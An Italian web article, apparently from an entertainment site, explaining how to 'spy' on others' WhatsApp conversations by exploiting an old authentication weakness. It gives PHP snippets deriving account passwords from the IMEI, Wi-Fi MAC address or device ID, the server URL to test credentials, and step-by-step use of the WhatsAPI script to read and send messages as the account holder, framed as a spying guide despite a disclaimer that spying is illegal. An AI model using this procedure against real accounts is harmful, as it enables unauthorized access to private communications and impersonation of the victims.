WhatsApp: come spiare le conversazioni altrui

Con un po’ di impegno chiunque potrebbe essere in grado di spiare le vostre conversazioni private su WhatsApp: ecco come

La scorsa settimana uno studente di Informatica dell’Università di Utrecht, Thijs Alkemade, ha scoperto una nuova falla nella sicurezza di WhatsApp, svelando un potenziale rischio per la privacy degli utenti che va ad aggiungersi alla lunghissima lista di bug rilevati negli ultimi mesi: ne abbiamo parlato diffusamente in questo articolo.

WhatsApp è l’applicazione per la messaggistica istantanea più diffusa nel mercato degli smartphone e viene regolarmente utilizzata da circa 500 milioni di utenti in tutto il mondo: non sorprende, quindi, il vespaio di polemiche scatenato nelle ultime ore dalla scoperta di Alkemade, che presumibilmente costringerà gli sviluppatori del software a rilasciare un aggiornamento della sicurezza in tempi rapidi.

Già in passato WhatsApp era finito nell’occhio del ciclone per problemi legati alla salvaguardia della privacy degli utenti che l’ultimo aggiornamento è riuscito a risolvere solo in parte: di fatto programmi come WhatsApp sniffer, facilmente reperibili sul web, sono tutt’ora in grado di aggirare le deboli misure di sicurezza integrate nel software.

Di seguito vi proponiamo, a scopo puramente informativo, una procedura che in passato permetteva anche ad utenti non particolarmente esperti di “spiare” le conversazioni private su WhatsApp. La fonte dell’articolo è www.oversecurity.net. Ricordate che spiare le conversazioni altrui, qualunque sia il metodo adottato, è ILLEGALE.


AGGIRARE LA SICUREZZA DI WHATSAPP

Ogni utente che vuole inviare un messaggio o verificare se ha dei messaggi da leggere si autentica sui server attraverso una “password” generata automaticamente dal software. La password è però facilmente riconducibile perché si basa sul codice IMEI degli Smartphone non Apple o del MAC Address per gli utenti Apple.

Generazione della Password per i dispositivi Android:

$imei = “112222223333334″; //  IMEI di esempio
$androidWhatsAppPassword = md5(strrev($imei)); // calcolo della Password (inversione dell’IMEI e generazione del MD5)

Generazione della Password per i dispositivi iOS a cura di Ezio Amodio:

$wlanMAC = “AA:BB:CC:DD:EE:FF”; // WLAN MAC address di esempio
$iphoneWhatsAppPassword = md5($wlanMAC$wlanMAC); // calcolo della Password

Generazione della Password per i dispositivi BlackBerry:

$imei = “112222223333334″; //  IMEI di esempio
$BBWhatsAppPassword = md5(strrev($imei)); // calcolo della Password (inversione dell’IMEI e generazione del MD5)

Per i dispositivi BB non è possibile avviare una conversazione interattiva, il servizio BIS vi scollegherà una volta inviato il primo messaggio rendendo impossibile la lettura della risposta.

Generazione della Password per i dispositivi Windows Phone a cura di Ezio Amodio:

$DeviceUniqueID = “112222223333334″ // ID del Dispositivo
$WPWhatsAppPassword = $DeviceUniqueID // calcolo della Password

Per la lettura del vostro ID Dispositivo potete affidarvi all’applicazione gratuita Device Unique Id disponibile nel Market Place.

L’username è ancor più semplicemente il vostro numero di cellulare anteposto dal prefisso internazionale senza il simbolo + o il doppio zero (Es. 393481234567).

 

Siete utilizzatori di WhatsApp? Bene provate voi stessi ad autentificarvi, vi basterà aprire il vostro Browsere digitare il seguente URL:  

https://r.whatsapp.net/v1/exist.phpcc=$countrycode&in=$phonenumber&udid=$password

Dovrete sostituire i campi $countrycode, $phonenumber e $password con i relativi dati ovvero il vostro codice paese (per l’Italia è il 39) senza il simbolo + o il doppio zero, il numero di cellulare e la password che avete attentamente calcolato secondo le specifiche precedentemente illustrate.

Se tutto andrà per il meglio il vostro Browser vi riporterà la seguente stringa XML:

<exist>

<response status=”ok” result=”393481234567″/>

</exist>

Notate immediatamente che l’esito dello stato è OK il che conferma che avete ottenuto l’accesso al vostro account, se invece la password generata o l’utente non è riconosciuto dal servizio di messaggistica apparirà la dicitura FAIL.

Con la stessa identica metodologia, invio di variabili GET su PHP, possiamo inviare messaggi ad utenti WhatsApp o verificare se ci sono messaggi non letti. Per automatizzare la procedura ci viene in soccorso uno script denominato WhatsAPI e disponibile sul circuito GitHub.

WhatsAPI ci permette quindi di testare la sicurezza di WhatsApp rendendo possibile l’invio di messaggi e la relativa ricezione attraverso il nostro PC anziché sullo Smartphone, lo script è di estremo utilizzo e richiede l’installazione di PHP sulla nostra distribuzione.

Nell’esempio di seguito sfrutteremo la distribuzione BackBox basata su Ubuntu Linux, vi consigliamo di usare una distribuzione Unix Based anche se PHP è disponibile anche per Windows.

Terminato il download di WhatsAPI estraiamo il contenuto e dirigiamoci nella cartella “test” in essa troveremo un unico file denominato “whatsapp.php” apriamolo attraverso l’editor di testo che più preferiamo e dirigiamoci alla 16° riga dove troveremo tre parametri da editare, nello specifico:

$nickname = “WhatsAPI Test”;
$sender = “393481234567″; // Mobile number with country code (but without + or 00)
$imei = “35xxxxxxxxxxxxx”; // MAC Address for iOS IMEI for other platform (Android/etc)

Come è facile intuire nel campo Nickname specifichiamo il soprannome da utilizzare durante l’invio dei messaggi, nel campo Sender specifichiamo il nostro numero di cellulare comprensivo del codice paese senza il simbolo + o il doppio zero e infine indichiamo il nostro codice IMEI o WLAN MAC address se usiamo un dispositivo Apple.

Salviamo il file ed ora siamo pronti ad avviare lo script PHP, semplicemente da riga di comando digitiamo:

$ php whatsapp.php

Il software ci risponderà con una breve ma efficace guida:

USAGE: whatsapp.php [-l] [-s <phone> <message>] [-i <phone>]

phone: full number including country code, without ‘+’ or ’00′
-s: send message
-l: listen for new messages
-i: interactive conversation with <phone>

Facilmente intuiamo che attraverso il parametro “-s” possiamo inviare un nuovo messaggio, con il parametro “-l” individuiamo eventuali messaggi non letti ed infine con il parametro “-i” avviamo una vera e propria conversazione interattiva nella quale potremo scrivere messaggi e leggere le eventuali risposte.

Per avviare una conversazione è quindi necessario digitare il seguente comando:

$ php whatsapp.php -i 39348123456



Ecco un video che illustra il funzionamento di WhatsApp sniffer, applicazione cui abbiamo accennato all’inizio dell’articolo:

(St.S.)

TV

Anticipazioni Un Posto al Sole: da lunedì 5 a venerdì 9 dicembre 2016

Scopriamo cosa ci riservano le trame della soap Un Posto al Sole per la prima settimana del mese di dicembre.

TV

Anticipazioni Il Segreto: da lunedì 5 a sabato 10 dicembre 2016

Scopriamo le anticipazioni della soap Il Segreto per la prima settimana di dicembre.

Gossip

Uomini e Donne: Riccardo spiazza tutti e sceglie Camilla. Martina accusa la coppia di falsità

Nel corso della registrazione di Venerdì 3 Dicembre, c’è stata un’altra scelta, questa volta a sorpresa. Riccardo Gismondi è uscito dal programma di Maria De Filippi […]

TV

Anticipazioni Una Vita: da lunedì 5 a venerdì 9 dicembre 2016

Scopriamo cosa ci riservano le puntate della soap Una Vita, per questa prima settimana del mese di dicembre.

Gossip

Uomini e Donne, trono gay, Claudio ha scelto Mario e commenta su Instagram” “Sedersi e avere un unico pensiero. Fantastico”

Venerdì 2 Dicembre, si è registrata la puntata della scelta di Claudio Sona. Il tronista diviso tra i due pretendenti Francesco Zecchini e Mario Serpa, sceglie Mario!  Si è […]

TV

Anticipazioni Beautiful: da lunedì 5 a sabato 10 dicembre 2016

Tutte le anticipazioni della soap Beautiful per la prima settimana di dicembre…

Un commento su “WhatsApp: come spiare le conversazioni altrui”

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Tag